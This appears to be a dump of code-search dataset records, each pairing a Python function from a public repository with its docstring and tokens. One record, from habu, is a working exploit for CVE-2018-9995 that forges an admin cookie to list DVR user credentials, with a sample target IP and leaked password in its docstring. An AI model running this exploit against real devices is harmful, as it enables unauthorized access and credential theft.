Concat existing files together. For preconditions, see https://hadoop.apache.org/docs/current/hadoop-project-dist/hadoop-common/filesystem/filesystem.html#void_concatPath_p_Path_sources :param target: the path to the target destination. :param sources: the paths to the sources to use for the concatenation. :type sources: list
[ "Concat", "existing", "files", "together", "." ]
python
train
bitesofcode/projexui
projexui/widgets/xorbrecordedit.py
https://github.com/bitesofcode/projexui/blob/f18a73bec84df90b034ca69b9deea118dbedfc4d/projexui/widgets/xorbrecordedit.py#L222-L248
def setRecord( self, record ): """ Sets the record instance for this widget to the inputed record. :param record | <orb.Table> """ self._record = record if ( not record ): return self.setModel(record.__class__) schema = self.model().schema() # set the information column_edits = self.findChildren(XOrbColumnEdit) for widget in column_edits: columnName = widget.columnName() column = schema.column(columnName) if ( not column ): logger.warning('%s is not a valid column of %s.' % \ (columnName, schema.name())) continue # update the values widget.setValue(record.recordValue(columnName))
[ "def", "setRecord", "(", "self", ",", "record", ")", ":", "self", ".", "_record", "=", "record", "if", "(", "not", "record", ")", ":", "return", "self", ".", "setModel", "(", "record", ".", "__class__", ")", "schema", "=", "self", ".", "model", "(", ...
Sets the record instance for this widget to the inputed record. :param record | <orb.Table>
[ "Sets", "the", "record", "instance", "for", "this", "widget", "to", "the", "inputed", "record", ".", ":", "param", "record", "|", "<orb", ".", "Table", ">" ]
python
train
bmwcarit/zubbi
zubbi/utils.py
https://github.com/bmwcarit/zubbi/blob/b99dfd6113c0351f13876f4172648c2eb63468ba/zubbi/utils.py#L44-L59
def prettydate(date): now = datetime.now(timezone.utc) """ Return the relative timeframe between the given date and now. e.g. 'Just now', 'x days ago', 'x hours ago', ... When the difference is greater than 7 days, the timestamp will be returned instead. """ diff = now - date # Show the timestamp rather than the relative timeframe when the difference # is greater than 7 days if diff.days > 7: return date.strftime("%d. %b %Y") return arrow.get(date).humanize()
[ "def", "prettydate", "(", "date", ")", ":", "now", "=", "datetime", ".", "now", "(", "timezone", ".", "utc", ")", "diff", "=", "now", "-", "date", "# Show the timestamp rather than the relative timeframe when the difference", "# is greater than 7 days", "if", "diff", ...
Return the relative timeframe between the given date and now. e.g. 'Just now', 'x days ago', 'x hours ago', ... When the difference is greater than 7 days, the timestamp will be returned instead.
[ "Return", "the", "relative", "timeframe", "between", "the", "given", "date", "and", "now", "." ]
python
train
collectiveacuity/labPack
labpack/location/find.py
https://github.com/collectiveacuity/labPack/blob/52949ece35e72e3cc308f54d9ffa6bfbd96805b8/labpack/location/find.py#L296-L366
def update_positions(self): ''' a method to update the latest position of all users being tracked :return: dictionary with user_id keys and location/time dictionary values NOTE: self.players is updated with position details { 'user_id': { 'time': 0.0, 'location': 'location.id' } } ''' # construct user list user_list = [] for key in self.positions.keys(): user_list.append(key) # return empty result if not user_list: return self.positions # compose request import requests url = self.endpoint + '/location' while user_list: # batch requests if len(user_list) > 50: user_batch = user_list[0:50] else: user_batch = user_list params = { 'group': self.group_name, 'users': ','.join(user_batch), 'n': 1 } response = requests.get(url, params=params) # ingest response response_details = response.json() from labpack.records.time import labDT if 'users' in response_details.keys(): for key in response_details['users'].keys(): position_details = {} if key in user_batch: for entry in response_details['users'][key]: if 'time' in entry.keys() and 'location' in entry.keys(): time_string = entry['time'] time_string = time_string.replace(' +0000 UTC', 'Z') time_string = time_string.replace(' ', 'T') time_dt = labDT.fromISO(time_string).epoch() position_details = { 'time': time_dt, 'location': entry['location'] } break self.positions[key] = position_details # slice user list if len(user_list) > 50: user_list = user_list[50:0] else: user_list = [] return self.positions
[ "def", "update_positions", "(", "self", ")", ":", "# construct user list", "user_list", "=", "[", "]", "for", "key", "in", "self", ".", "positions", ".", "keys", "(", ")", ":", "user_list", ".", "append", "(", "key", ")", "# return empty result", "if", "no...
a method to update the latest position of all users being tracked :return: dictionary with user_id keys and location/time dictionary values NOTE: self.players is updated with position details { 'user_id': { 'time': 0.0, 'location': 'location.id' } }
[ "a", "method", "to", "update", "the", "latest", "position", "of", "all", "users", "being", "tracked", ":", "return", ":", "dictionary", "with", "user_id", "keys", "and", "location", "/", "time", "dictionary", "values", "NOTE", ":", "self", ".", "players", ...
python
train
signalfx/signalfx-python
signalfx/signalflow/ws.py
https://github.com/signalfx/signalfx-python/blob/650eb9a2b301bcc795e4e3a8c031574ade69849d/signalfx/signalflow/ws.py#L146-L155
def opened(self): """Handler called when the WebSocket connection is opened. The first thing to do then is to authenticate ourselves.""" request = { 'type': 'authenticate', 'token': self._token, 'userAgent': '{} ws4py/{}'.format(version.user_agent, ws4py.__version__), } self.send(json.dumps(request))
[ "def", "opened", "(", "self", ")", ":", "request", "=", "{", "'type'", ":", "'authenticate'", ",", "'token'", ":", "self", ".", "_token", ",", "'userAgent'", ":", "'{} ws4py/{}'", ".", "format", "(", "version", ".", "user_agent", ",", "ws4py", ".", "__ve...
Handler called when the WebSocket connection is opened. The first thing to do then is to authenticate ourselves.
[ "Handler", "called", "when", "the", "WebSocket", "connection", "is", "opened", ".", "The", "first", "thing", "to", "do", "then", "is", "to", "authenticate", "ourselves", "." ]
python
train
spacetelescope/stsci.tools
lib/stsci/tools/teal.py
https://github.com/spacetelescope/stsci.tools/blob/9a022503ad24ca54ce83331482dfa3ff6de9f403/lib/stsci/tools/teal.py#L343-L361
def execEmbCode(SCOPE, NAME, VAL, TEAL, codeStr): """ .cfgspc embedded code execution is done here, in a relatively confined space. The variables available to the code to be executed are: SCOPE, NAME, VAL, PARENT, TEAL The code string itself is expected to set a var named OUT """ # This was all we needed in Python 2.x # OUT = None # exec codeStr # return OUT # In Python 3 (& 2.x) be more explicit: http://bugs.python.org/issue4831 PARENT = None if TEAL: PARENT = TEAL.top OUT = None ldict = locals() # will have OUT in it exec(codeStr, globals(), ldict) return ldict['OUT']
[ "def", "execEmbCode", "(", "SCOPE", ",", "NAME", ",", "VAL", ",", "TEAL", ",", "codeStr", ")", ":", "# This was all we needed in Python 2.x", "# OUT = None", "# exec codeStr", "# return OUT", "# In Python 3 (& 2.x) be more explicit: http://bugs.python.org/issue4831", "PA...
.cfgspc embedded code execution is done here, in a relatively confined space. The variables available to the code to be executed are: SCOPE, NAME, VAL, PARENT, TEAL The code string itself is expected to set a var named OUT
[ ".", "cfgspc", "embedded", "code", "execution", "is", "done", "here", "in", "a", "relatively", "confined", "space", ".", "The", "variables", "available", "to", "the", "code", "to", "be", "executed", "are", ":", "SCOPE", "NAME", "VAL", "PARENT", "TEAL", "Th...
python
train
isislovecruft/python-gnupg
pretty_bad_protocol/_parsers.py
https://github.com/isislovecruft/python-gnupg/blob/784571449032e811587249743e183fc5e908a673/pretty_bad_protocol/_parsers.py#L883-L896
def _handle_status(self, key, value): """Parse a status code from the attached GnuPG process. :raises: :exc:`~exceptions.ValueError` if the status message is unknown. """ if key in ("USERID_HINT", "NEED_PASSPHRASE", "GET_HIDDEN", "SIGEXPIRED", "KEYEXPIRED", "GOOD_PASSPHRASE", "GOT_IT", "GET_LINE"): pass elif key in ("BAD_PASSPHRASE", "MISSING_PASSPHRASE"): self.status = key.replace("_", " ").lower() else: self.status = 'failed' raise ValueError("Unknown status message: %r" % key)
[ "def", "_handle_status", "(", "self", ",", "key", ",", "value", ")", ":", "if", "key", "in", "(", "\"USERID_HINT\"", ",", "\"NEED_PASSPHRASE\"", ",", "\"GET_HIDDEN\"", ",", "\"SIGEXPIRED\"", ",", "\"KEYEXPIRED\"", ",", "\"GOOD_PASSPHRASE\"", ",", "\"GOT_IT\"", "...
Parse a status code from the attached GnuPG process. :raises: :exc:`~exceptions.ValueError` if the status message is unknown.
[ "Parse", "a", "status", "code", "from", "the", "attached", "GnuPG", "process", "." ]
python
train
reingart/pyafipws
wslpg.py
https://github.com/reingart/pyafipws/blob/ee87cfe4ac12285ab431df5fec257f103042d1ab/wslpg.py#L1389-L1415
def AjustarLiquidacionUnificado(self): "Ajustar Liquidación Primaria de Granos" # limpiar estructuras no utilizadas (si no hay deducciones / retenciones) for k in ('ajusteDebito', 'ajusteCredito'): if not any(self.ajuste[k].values()): del self.ajuste[k] else: if not self.ajuste[k]['deducciones']: del self.ajuste[k]['deducciones'] if not self.ajuste[k]['retenciones']: del self.ajuste[k]['retenciones'] # llamar al webservice: ret = self.client.liquidacionAjustarUnificado( auth={ 'token': self.Token, 'sign': self.Sign, 'cuit': self.Cuit, }, **self.ajuste ) # analizar el resultado: ret = ret['ajusteUnifReturn'] self.__analizar_errores(ret) if 'ajusteUnificado' in ret: aut = ret['ajusteUnificado'] self.AnalizarAjuste(aut) return True
[ "def", "AjustarLiquidacionUnificado", "(", "self", ")", ":", "# limpiar estructuras no utilizadas (si no hay deducciones / retenciones)", "for", "k", "in", "(", "'ajusteDebito'", ",", "'ajusteCredito'", ")", ":", "if", "not", "any", "(", "self", ".", "ajuste", "[", "k...
Ajustar Liquidación Primaria de Granos
[ "Ajustar", "Liquidación", "Primaria", "de", "Granos" ]
python
train
fantasticfears/kgekit
kgekit/data.py
https://github.com/fantasticfears/kgekit/blob/5e464e1fc3ae9c7e216f6dd94f879a967d065247/kgekit/data.py#L69-L105
def shrink_indexes_in_place(self, triples): """Uses a union find to find segment.""" _ent_roots = self.UnionFind(self._ent_id) _rel_roots = self.UnionFind(self._rel_id) for t in triples: _ent_roots.add(t.head) _ent_roots.add(t.tail) _rel_roots.add(t.relation) for i, t in enumerate(triples): h = _ent_roots.find(t.head) r = _rel_roots.find(t.relation) t = _ent_roots.find(t.tail) triples[i] = kgedata.TripleIndex(h, r, t) ents = bidict() available_ent_idx = 0 for previous_idx, ent_exist in enumerate(_ent_roots.roots()): if not ent_exist: self._ents.inverse.pop(previous_idx) else: ents[self._ents.inverse[previous_idx]] = available_ent_idx available_ent_idx += 1 rels = bidict() available_rel_idx = 0 for previous_idx, rel_exist in enumerate(_rel_roots.roots()): if not rel_exist: self._rels.inverse.pop(previous_idx) else: rels[self._rels.inverse[previous_idx]] = available_rel_idx available_rel_idx += 1 self._ents = ents self._rels = rels self._ent_id = available_ent_idx self._rel_id = available_rel_idx
[ "def", "shrink_indexes_in_place", "(", "self", ",", "triples", ")", ":", "_ent_roots", "=", "self", ".", "UnionFind", "(", "self", ".", "_ent_id", ")", "_rel_roots", "=", "self", ".", "UnionFind", "(", "self", ".", "_rel_id", ")", "for", "t", "in", "trip...
Uses a union find to find segment.
[ "Uses", "a", "union", "find", "to", "find", "segment", "." ]
python
valid
alefnula/tea
tea/shell/__init__.py
https://github.com/alefnula/tea/blob/f5a0a724a425ec4f9dd2c7fe966ef06faf3a15a3/tea/shell/__init__.py#L276-L297
def move(source, destination): """Move a file or directory (recursively) to another location. If the destination is on our current file system, then simply use rename. Otherwise, copy source to the destination and then remove source. Args: source (str): Source file or directory (file or directory to move). destination (str): Destination file or directory (where to move). Returns: bool: True if the operation is successful, False otherwise. """ logger.info("Move: %s -> %s" % (source, destination)) try: __create_destdir(destination) shutil.move(source, destination) return True except Exception: logger.exception("Failed to Move: %s -> %s" % (source, destination)) return False
[ "def", "move", "(", "source", ",", "destination", ")", ":", "logger", ".", "info", "(", "\"Move: %s -> %s\"", "%", "(", "source", ",", "destination", ")", ")", "try", ":", "__create_destdir", "(", "destination", ")", "shutil", ".", "move", "(", "source", ...
Move a file or directory (recursively) to another location. If the destination is on our current file system, then simply use rename. Otherwise, copy source to the destination and then remove source. Args: source (str): Source file or directory (file or directory to move). destination (str): Destination file or directory (where to move). Returns: bool: True if the operation is successful, False otherwise.
[ "Move", "a", "file", "or", "directory", "(", "recursively", ")", "to", "another", "location", "." ]
python
train
portantier/habu
habu/cli/cmd_cve_2018_9995.py
https://github.com/portantier/habu/blob/87091e389dc6332fe1b82830c22b2eefc55816f2/habu/cli/cmd_cve_2018_9995.py#L14-L67
def cmd_cve_2018_9995(ip, port, verbose): """Exploit the CVE-2018-9995 vulnerability, present on various DVR systems. Note: Based on the original code from Ezequiel Fernandez (@capitan_alfa). Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9995 Example: \b $ python habu.cve.2018-9995 82.202.102.42 [ { "uid": "admin", "pwd": "securepassword", "role": 2, "enmac": 0, "mac": "00:00:00:00:00:00", "playback": 4294967295, "view": 4294967295, "rview": 4294967295, "ptz": 4294967295, "backup": 4294967295, "opt": 4294967295 } ] """ url = 'http://' + ip + ':' + str(port) fullhost = url + '/device.rsp?opt=user&cmd=list' headers = { 'Host': ip, 'User-Agent': 'Morzilla/7.0 (911; Pinux x86_128; rv:9743.0)', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Languag': 'es-AR,en-US;q=0.7,en;q=0.3', 'Connection': 'close', 'Content-Type': 'text/html', 'Cookie': 'uid=admin', } try: r = requests.get(fullhost, headers=headers,timeout=10) except Exception as e: print('Exception:', e) sys.exit(1) try: data = r.json() except Exception as e: print('Exception:', e) sys.exit(1) print(json.dumps(data["list"], indent=4))
[ "def", "cmd_cve_2018_9995", "(", "ip", ",", "port", ",", "verbose", ")", ":", "url", "=", "'http://'", "+", "ip", "+", "':'", "+", "str", "(", "port", ")", "fullhost", "=", "url", "+", "'/device.rsp?opt=user&cmd=list'", "headers", "=", "{", "'Host'", ":"...
Exploit the CVE-2018-9995 vulnerability, present on various DVR systems. Note: Based on the original code from Ezequiel Fernandez (@capitan_alfa). Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9995 Example: \b $ python habu.cve.2018-9995 82.202.102.42 [ { "uid": "admin", "pwd": "securepassword", "role": 2, "enmac": 0, "mac": "00:00:00:00:00:00", "playback": 4294967295, "view": 4294967295, "rview": 4294967295, "ptz": 4294967295, "backup": 4294967295, "opt": 4294967295 } ]
[ "Exploit", "the", "CVE", "-", "2018", "-", "9995", "vulnerability", "present", "on", "various", "DVR", "systems", "." ]
python
train
spyder-ide/spyder
spyder/plugins/editor/lsp/transport/main.py
https://github.com/spyder-ide/spyder/blob/f76836ce1b924bcc4efd3f74f2960d26a4e528e0/spyder/plugins/editor/lsp/transport/main.py#L102-L107
def restore(self): """Restore signal handlers to their original settings.""" signal.signal(signal.SIGINT, self.original_sigint) signal.signal(signal.SIGTERM, self.original_sigterm) if os.name == 'nt': signal.signal(signal.SIGBREAK, self.original_sigbreak)
[ "def", "restore", "(", "self", ")", ":", "signal", ".", "signal", "(", "signal", ".", "SIGINT", ",", "self", ".", "original_sigint", ")", "signal", ".", "signal", "(", "signal", ".", "SIGTERM", ",", "self", ".", "original_sigterm", ")", "if", "os", "."...
Restore signal handlers to their original settings.
[ "Restore", "signal", "handlers", "to", "their", "original", "settings", "." ]
python
train
fitnr/convertdate
convertdate/mayan.py
https://github.com/fitnr/convertdate/blob/e920f168a87f99183b0aa7290d6c3af222582d43/convertdate/mayan.py#L176-L194
def next_haab(month, jd): '''For a given haab month and a julian day count, find the next start of that month on or after the JDC''' if jd < EPOCH: raise IndexError("Input day is before Mayan epoch.") hday, hmonth = to_haab(jd) if hmonth == month: days = 1 - hday else: count1 = _haab_count(hday, hmonth) count2 = _haab_count(1, month) # Find number of days between haab of given jd and desired haab days = (count2 - count1) % 365 # add in the number of days and return new jd return jd + days
[ "def", "next_haab", "(", "month", ",", "jd", ")", ":", "if", "jd", "<", "EPOCH", ":", "raise", "IndexError", "(", "\"Input day is before Mayan epoch.\"", ")", "hday", ",", "hmonth", "=", "to_haab", "(", "jd", ")", "if", "hmonth", "==", "month", ":", "day...
For a given haab month and a julian day count, find the next start of that month on or after the JDC
[ "For", "a", "given", "haab", "month", "and", "a", "julian", "day", "count", "find", "the", "next", "start", "of", "that", "month", "on", "or", "after", "the", "JDC" ]
python
train
miLibris/flask-rest-jsonapi
flask_rest_jsonapi/resource.py
https://github.com/miLibris/flask-rest-jsonapi/blob/ecc8f2cd2b54cc0bfae7acd6cffcda0ba1140c43/flask_rest_jsonapi/resource.py#L235-L286
def patch(self, *args, **kwargs): """Update an object""" json_data = request.get_json() or {} qs = QSManager(request.args, self.schema) schema_kwargs = getattr(self, 'patch_schema_kwargs', dict()) schema_kwargs.update({'partial': True}) self.before_marshmallow(args, kwargs) schema = compute_schema(self.schema, schema_kwargs, qs, qs.include) try: data, errors = schema.load(json_data) except IncorrectTypeError as e: errors = e.messages for error in errors['errors']: error['status'] = '409' error['title'] = "Incorrect type" return errors, 409 except ValidationError as e: errors = e.messages for message in errors['errors']: message['status'] = '422' message['title'] = "Validation error" return errors, 422 if errors: for error in errors['errors']: error['status'] = "422" error['title'] = "Validation error" return errors, 422 if 'id' not in json_data['data']: raise BadRequest('Missing id in "data" node', source={'pointer': '/data/id'}) if (str(json_data['data']['id']) != str(kwargs[getattr(self._data_layer, 'url_field', 'id')])): raise BadRequest('Value of id does not match the resource identifier in url', source={'pointer': '/data/id'}) self.before_patch(args, kwargs, data=data) obj = self.update_object(data, qs, kwargs) result = schema.dump(obj).data final_result = self.after_patch(result) return final_result
[ "def", "patch", "(", "self", ",", "*", "args", ",", "*", "*", "kwargs", ")", ":", "json_data", "=", "request", ".", "get_json", "(", ")", "or", "{", "}", "qs", "=", "QSManager", "(", "request", ".", "args", ",", "self", ".", "schema", ")", "schem...
Update an object
[ "Update", "an", "object" ]
python
train
bcbio/bcbio-nextgen
bcbio/variation/qsnp.py
https://github.com/bcbio/bcbio-nextgen/blob/6a9348c0054ccd5baffd22f1bb7d0422f6978b20/bcbio/variation/qsnp.py#L31-L53
def run_qsnp(align_bams, items, ref_file, assoc_files, region=None, out_file=None): """Run qSNP calling on paired tumor/normal. """ if utils.file_exists(out_file): return out_file paired = get_paired_bams(align_bams, items) if paired.normal_bam: region_files = [] regions = _clean_regions(items, region) if regions: for region in regions: out_region_file = out_file.replace(".vcf.gz", _to_str(region) + ".vcf.gz") region_file = _run_qsnp_paired(align_bams, items, ref_file, assoc_files, region, out_region_file) region_files.append(region_file) out_file = combine_variant_files(region_files, out_file, ref_file, items[0]["config"]) if not region: out_file = _run_qsnp_paired(align_bams, items, ref_file, assoc_files, region, out_file) return out_file else: raise ValueError("qSNP only works on paired samples")
[ "def", "run_qsnp", "(", "align_bams", ",", "items", ",", "ref_file", ",", "assoc_files", ",", "region", "=", "None", ",", "out_file", "=", "None", ")", ":", "if", "utils", ".", "file_exists", "(", "out_file", ")", ":", "return", "out_file", "paired", "="...
Run qSNP calling on paired tumor/normal.
[ "Run", "qSNP", "calling", "on", "paired", "tumor", "/", "normal", "." ]
python
train
pettarin/ipapy
ipapy/ipachar.py
https://github.com/pettarin/ipapy/blob/ede4b3c40636f6eb90068369d31a2e75c7115324/ipapy/ipachar.py#L816-L824
def roundness(self, value): """ Set the roundness of the vowel. :param str value: the value to be set """ if (value is not None) and (not value in DG_V_ROUNDNESS): raise ValueError("Unrecognized value for roundness: '%s'" % value) self.__roundness = value
[ "def", "roundness", "(", "self", ",", "value", ")", ":", "if", "(", "value", "is", "not", "None", ")", "and", "(", "not", "value", "in", "DG_V_ROUNDNESS", ")", ":", "raise", "ValueError", "(", "\"Unrecognized value for roundness: '%s'\"", "%", "value", ")", ...
Set the roundness of the vowel. :param str value: the value to be set
[ "Set", "the", "roundness", "of", "the", "vowel", "." ]
python
train
ARMmbed/yotta
yotta/lib/access_common.py
https://github.com/ARMmbed/yotta/blob/56bc1e56c602fa20307b23fe27518e9cd6c11af1/yotta/lib/access_common.py#L324-L346
def unpackTarballStream(stream, into_directory, hash={}, cache_key=None, origin_info=dict()): ''' Unpack a responses stream that contains a tarball into a directory. If a hash is provided, then it will be used as a cache key (for future requests you can try to retrieve the key value from the cache first, before making the request) ''' cache_key = _encodeCacheKey(cache_key) # if the cache is disabled, then use a random cache key even if one was # provided, so that the module is not persisted in the cache and its # temporary download location is a random key: if getMaxCachedModules() == 0: cache_key = None new_cache_key = _downloadToCache(stream, hash, origin_info) unpackFromCache(new_cache_key, into_directory) if cache_key is None: # if we didn't provide a cache key, there's no point in storing the cache removeFromCache(new_cache_key) else: # otherwise make this file available at the known cache key _moveCachedFile(new_cache_key, cache_key)
[ "def", "unpackTarballStream", "(", "stream", ",", "into_directory", ",", "hash", "=", "{", "}", ",", "cache_key", "=", "None", ",", "origin_info", "=", "dict", "(", ")", ")", ":", "cache_key", "=", "_encodeCacheKey", "(", "cache_key", ")", "# if the cache is...
Unpack a responses stream that contains a tarball into a directory. If a hash is provided, then it will be used as a cache key (for future requests you can try to retrieve the key value from the cache first, before making the request)
[ "Unpack", "a", "responses", "stream", "that", "contains", "a", "tarball", "into", "a", "directory", ".", "If", "a", "hash", "is", "provided", "then", "it", "will", "be", "used", "as", "a", "cache", "key", "(", "for", "future", "requests", "you", "can", ...
python
valid
Fantomas42/django-blog-zinnia
zinnia/admin/entry.py
https://github.com/Fantomas42/django-blog-zinnia/blob/b4949304b104a8e1a7a7a0773cbfd024313c3a15/zinnia/admin/entry.py#L294-L300
def close_trackbacks(self, request, queryset): """ Close the trackbacks for selected entries. """ queryset.update(trackback_enabled=False) self.message_user( request, _('Trackbacks are now closed for selected entries.'))
[ "def", "close_trackbacks", "(", "self", ",", "request", ",", "queryset", ")", ":", "queryset", ".", "update", "(", "trackback_enabled", "=", "False", ")", "self", ".", "message_user", "(", "request", ",", "_", "(", "'Trackbacks are now closed for selected entries....
Close the trackbacks for selected entries.
[ "Close", "the", "trackbacks", "for", "selected", "entries", "." ]
python
train
happyleavesaoc/python-limitlessled
limitlessled/group/commands/__init__.py
https://github.com/happyleavesaoc/python-limitlessled/blob/70307c2bf8c91430a99579d2ad18b228ec7a8488/limitlessled/group/commands/__init__.py#L5-L31
def command_set_factory(bridge, group_number, led_type): """ Create command set for controlling a specific led group. :param bridge: The bridge the leds are connected to. :param group_number: The group number. :param led_type: The type of the leds. :return: The created command set. """ from limitlessled.group.commands.legacy import ( CommandSetWhiteLegacy, CommandSetRgbwLegacy) from limitlessled.group.commands.v6 import ( CommandSetBridgeLightV6, CommandSetWhiteV6, CommandSetDimmerV6, CommandSetRgbwV6, CommandSetRgbwwV6, CommandSetWrgbV6) command_sets = [CommandSetWhiteLegacy, CommandSetRgbwLegacy, CommandSetBridgeLightV6, CommandSetWhiteV6, CommandSetDimmerV6, CommandSetRgbwV6, CommandSetRgbwwV6, CommandSetWrgbV6] try: cls = next(cs for cs in command_sets if bridge.version in cs.SUPPORTED_VERSIONS and led_type in cs.SUPPORTED_LED_TYPES) return cls(group_number) except StopIteration: raise ValueError('There is no command set for ' 'specified bridge version and led type.')
[ "def", "command_set_factory", "(", "bridge", ",", "group_number", ",", "led_type", ")", ":", "from", "limitlessled", ".", "group", ".", "commands", ".", "legacy", "import", "(", "CommandSetWhiteLegacy", ",", "CommandSetRgbwLegacy", ")", "from", "limitlessled", "."...
Create command set for controlling a specific led group. :param bridge: The bridge the leds are connected to. :param group_number: The group number. :param led_type: The type of the leds. :return: The created command set.
[ "Create", "command", "set", "for", "controlling", "a", "specific", "led", "group", ".", ":", "param", "bridge", ":", "The", "bridge", "the", "leds", "are", "connected", "to", ".", ":", "param", "group_number", ":", "The", "group", "number", ".", ":", "pa...
python
train
apache/airflow
airflow/hooks/mysql_hook.py
https://github.com/apache/airflow/blob/b69c686ad8a0c89b9136bb4b31767257eb7b2597/airflow/hooks/mysql_hook.py#L107-L117
def bulk_load(self, table, tmp_file): """ Loads a tab-delimited file into a database table """ conn = self.get_conn() cur = conn.cursor() cur.execute(""" LOAD DATA LOCAL INFILE '{tmp_file}' INTO TABLE {table} """.format(tmp_file=tmp_file, table=table)) conn.commit()
[ "def", "bulk_load", "(", "self", ",", "table", ",", "tmp_file", ")", ":", "conn", "=", "self", ".", "get_conn", "(", ")", "cur", "=", "conn", ".", "cursor", "(", ")", "cur", ".", "execute", "(", "\"\"\"\n LOAD DATA LOCAL INFILE '{tmp_file}'\n ...
Loads a tab-delimited file into a database table
[ "Loads", "a", "tab", "-", "delimited", "file", "into", "a", "database", "table" ]
python
test
log2timeline/plaso
plaso/cli/helpers/database_config.py
https://github.com/log2timeline/plaso/blob/9c564698d2da3ffbe23607a3c54c0582ea18a6cc/plaso/cli/helpers/database_config.py#L22-L45
def AddArguments(cls, argument_group): """Adds command line arguments the helper supports to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Args: argument_group (argparse._ArgumentGroup|argparse.ArgumentParser): argparse group. """ argument_group.add_argument( '--user', dest='username', type=str, action='store', default=cls._DEFAULT_USERNAME, metavar='USERNAME', required=False, help='The username used to connect to the database.') argument_group.add_argument( '--password', dest='password', type=str, action='store', default=cls._DEFAULT_PASSWORD, metavar='PASSWORD', help=( 'The password for the database user.')) argument_group.add_argument( '--db_name', '--db-name', dest='db_name', action='store', type=str, default=cls._DEFAULT_NAME, required=False, help=( 'The name of the database to connect to.')) server_config.ServerArgumentsHelper.AddArguments(argument_group)
[ "def", "AddArguments", "(", "cls", ",", "argument_group", ")", ":", "argument_group", ".", "add_argument", "(", "'--user'", ",", "dest", "=", "'username'", ",", "type", "=", "str", ",", "action", "=", "'store'", ",", "default", "=", "cls", ".", "_DEFAULT_U...
Adds command line arguments the helper supports to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports. Args: argument_group (argparse._ArgumentGroup|argparse.ArgumentParser): argparse group.
[ "Adds", "command", "line", "arguments", "the", "helper", "supports", "to", "an", "argument", "group", "." ]
python
train
jtwhite79/pyemu
pyemu/prototypes/moouu.py
https://github.com/jtwhite79/pyemu/blob/c504d8e7a4097cec07655a6318d275739bd8148a/pyemu/prototypes/moouu.py#L255-L289
def crowd_distance(self,obs_df): """determine the crowding distance for each candidate solution Parameters ---------- obs_df : pandas.DataFrame dataframe with columns of observation names and rows of realizations Returns ------- crowd_distance : pandas.Series series with index of obs_df and values of crowd distance """ # initialize the distance container crowd_distance = pd.Series(data=0.0,index=obs_df.index) for name,direction in self.obs_dict.items(): # make a copy - wasteful, but easier obj_df = obs_df.loc[:,name].copy() # sort so that largest values are first obj_df.sort_values(ascending=False,inplace=True) # set the ends so they are always retained crowd_distance.loc[obj_df.index[0]] += self.max_distance crowd_distance.loc[obj_df.index[-1]] += self.max_distance # process the vector i = 1 for idx in obj_df.index[1:-1]: crowd_distance.loc[idx] += obj_df.iloc[i-1] - obj_df.iloc[i+1] i += 1 return crowd_distance
[ "def", "crowd_distance", "(", "self", ",", "obs_df", ")", ":", "# initialize the distance container", "crowd_distance", "=", "pd", ".", "Series", "(", "data", "=", "0.0", ",", "index", "=", "obs_df", ".", "index", ")", "for", "name", ",", "direction", "in", ...
determine the crowding distance for each candidate solution Parameters ---------- obs_df : pandas.DataFrame dataframe with columns of observation names and rows of realizations Returns ------- crowd_distance : pandas.Series series with index of obs_df and values of crowd distance
[ "determine", "the", "crowding", "distance", "for", "each", "candidate", "solution" ]
python
train
mapbox/mapbox-sdk-py
mapbox/encoding.py
https://github.com/mapbox/mapbox-sdk-py/blob/72d19dbcf2d254a6ea08129a726471fd21f13023/mapbox/encoding.py#L20-L56
def read_points(features): """ Iterable of features to a sequence of point tuples Where "features" can be either GeoJSON mappings or objects implementing the geo_interface """ for feature in features: if isinstance(feature, (tuple, list)) and len(feature) == 2: yield feature elif hasattr(feature, '__geo_interface__'): # An object implementing the geo_interface try: # Could be a Feature... geom = feature.__geo_interface__['geometry'] for pt in _geom_points(geom): yield pt except KeyError: # ... or a geometry directly for pt in _geom_points(feature.__geo_interface__): yield pt elif 'type' in feature and feature['type'] == 'Feature': # A GeoJSON-like mapping geom = feature['geometry'] for pt in _geom_points(geom): yield pt elif 'coordinates' in feature: geom = feature for pt in _geom_points(geom): yield pt else: raise InvalidFeatureError( "Unknown object: Not a GeoJSON Point feature or " "an object with __geo_interface__:\n{0}".format(feature))
[ "def", "read_points", "(", "features", ")", ":", "for", "feature", "in", "features", ":", "if", "isinstance", "(", "feature", ",", "(", "tuple", ",", "list", ")", ")", "and", "len", "(", "feature", ")", "==", "2", ":", "yield", "feature", "elif", "ha...
Iterable of features to a sequence of point tuples Where "features" can be either GeoJSON mappings or objects implementing the geo_interface
[ "Iterable", "of", "features", "to", "a", "sequence", "of", "point", "tuples", "Where", "features", "can", "be", "either", "GeoJSON", "mappings", "or", "objects", "implementing", "the", "geo_interface" ]
python
train
keans/lmnotify
lmnotify/lmnotify.py
https://github.com/keans/lmnotify/blob/b0a5282a582e5090852dc20fea8a135ca258d0d3/lmnotify/lmnotify.py#L599-L614
def alarm_set(self, time, wake_with_radio=False): """ set the alarm clock :param str time: time of the alarm (format: %H:%M:%S) :param bool wake_with_radio: if True, radio will be used for the alarm instead of beep sound """ # TODO: check for correct time format log.debug("alarm => set...") params = { "enabled": True, "time": time, "wake_with_radio": wake_with_radio } self._app_exec("com.lametric.clock", "clock.alarm", params=params)
[ "def", "alarm_set", "(", "self", ",", "time", ",", "wake_with_radio", "=", "False", ")", ":", "# TODO: check for correct time format", "log", ".", "debug", "(", "\"alarm => set...\"", ")", "params", "=", "{", "\"enabled\"", ":", "True", ",", "\"time\"", ":", "...
set the alarm clock :param str time: time of the alarm (format: %H:%M:%S) :param bool wake_with_radio: if True, radio will be used for the alarm instead of beep sound
[ "set", "the", "alarm", "clock" ]
python
train
carpedm20/ndrive
ndrive/models.py
https://github.com/carpedm20/ndrive/blob/ac58eaf8a8d46292ad752bb38047f65838b8ad2b/ndrive/models.py#L302-L334
